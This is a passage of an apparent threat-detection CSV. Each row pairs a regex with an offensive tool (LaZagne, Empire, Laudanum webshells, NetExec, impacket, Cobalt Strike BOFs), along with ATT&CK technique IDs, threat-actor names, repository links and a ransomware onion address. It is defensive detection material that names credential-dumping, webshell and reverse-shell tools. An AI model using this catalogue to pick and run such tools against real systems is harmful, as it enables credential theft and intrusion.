T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50828" "*Laudanum PHP File Browser*",".{0,1000}Laudanum\sPHP\sFile\sBrowser.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50829" "*Laudanum PHP Hostname by IP Lookup*",".{0,1000}Laudanum\sPHP\sHostname\sby\sIP\sLookup.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50830" "*Laudanum PHP Proxy*",".{0,1000}Laudanum\sPHP\sProxy.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50831" "*Laudanum PHP Shell Access*",".{0,1000}Laudanum\sPHP\sShell\sAccess.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50832" "*Launch Empire CLI*",".{0,1000}Launch\sEmpire\sCLI.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation 
framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50833" "*Launch Empire Server*",".{0,1000}Launch\sEmpire\sServer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 
T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50834" "*launch4j launch4j/sAINT.xml*",".{0,1000}launch4j\slaunch4j\/sAINT\.xml.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50836" "*LaunchExploitMode.ps1*",".{0,1000}LaunchExploitMode\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","50838" "*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*",".{0,1000}LAUNCHING\sGPODDITY\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPO\sREQUESTS.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","50839" "*LaunchPreCompromise.ps1*",".{0,1000}LaunchPreCompromise\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","50840" "*lawrenceamer/dns-black-cat*",".{0,1000}lawrenceamer\/dns\-black\-cat.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","50841" "*lawrenceamer/Tchopper*",".{0,1000}lawrenceamer\/Tchopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","50842" "*layer8secure/SilentHound*",".{0,1000}layer8secure\/SilentHound.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","50843" "*Lazagne*Passwords.txt*",".{0,1000}Lazagne.{0,1000}Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - 
T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50844" "*laZagne.exe browsers*",".{0,1000}laZagne\.exe\sbrowsers.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50845" "*Lazagne.exe*",".{0,1000}Lazagne\.exe.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50846" "*laZagne.exe*",".{0,1000}laZagne\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50847" "*Lazagne.py*",".{0,1000}Lazagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50848" "*lazagne.softwares.sysadmin.aws*",".{0,1000}lazagne\.softwares\.sysadmin\.aws.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50849" "*lazagne.softwares.windows*",".{0,1000}lazagne\.softwares\.windows.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50850" "*lazagne.tar.gz*",".{0,1000}lazagne\.tar\.gz.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50851" "*LaZagneForensic*",".{0,1000}LaZagneForensic.{0,1000}","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","N/A","5","498","111","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z","50852" 
"*LaZagne-master.zip*",".{0,1000}LaZagne\-master\.zip.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50853" "*lazynmap.sh*",".{0,1000}lazynmap\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","1","N/A","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","50854" "*lazypariah *",".{0,1000}lazypariah\s.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","50855" "*lazypariah.svg*",".{0,1000}lazypariah\.svg.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","50856" "*lc65fb3wrvox6xlyn4hklwjcojau55diqxxylqs4qsfng23ftzijnxad.onion*",".{0,1000}lc65fb3wrvox6xlyn4hklwjcojau55diqxxylqs4qsfng23ftzijnxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50857" "*L-codes/pwcrack-framework*",".{0,1000}L\-codes\/pwcrack\-framework.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","50861" "*L'D', L'b', L'g', L'h', L'e', L'l', L'p', L'.', L'd', L'l', L'l', 
L'\0'*",".{0,1000}L\'D\',\sL\'b\',\sL\'g\',\sL\'h\',\sL\'e\',\sL\'l\',\sL\'p\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50862" "*ldap as ldap_impacket*",".{0,1000}ldap\sas\sldap_impacket.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","50863" "*LDAP PASSWORD ENUM*",".{0,1000}LDAP\sPASSWORD\sENUM.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50864" "*LDAP PASSWORD HUNTER*",".{0,1000}LDAP\sPASSWORD\sHUNTER.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50865" "*ldap_enums.go*",".{0,1000}ldap_enums\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - 
T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","50866" "*ldap_shell.py*",".{0,1000}ldap_shell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50867" 
"*ldap3.git@powerview.py*",".{0,1000}ldap3\.git\@powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50868" "*ldapasn1.py*",".{0,1000}ldapasn1\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50869" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 
- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50870" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50871" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50872" "*ldapdomaindump*",".{0,1000}ldapdomaindump.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","50873" "*LDAPDomainDump*",".{0,1000}LDAPDomainDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50874" 
"*ldapdomaindump.zip*",".{0,1000}ldapdomaindump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50875" "*ldapfilter:*admincount=1* /format:hashcat*",".{0,1000}ldapfilter\:.{0,1000}admincount\=1.{0,1000}\s\/format\:hashcat.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black 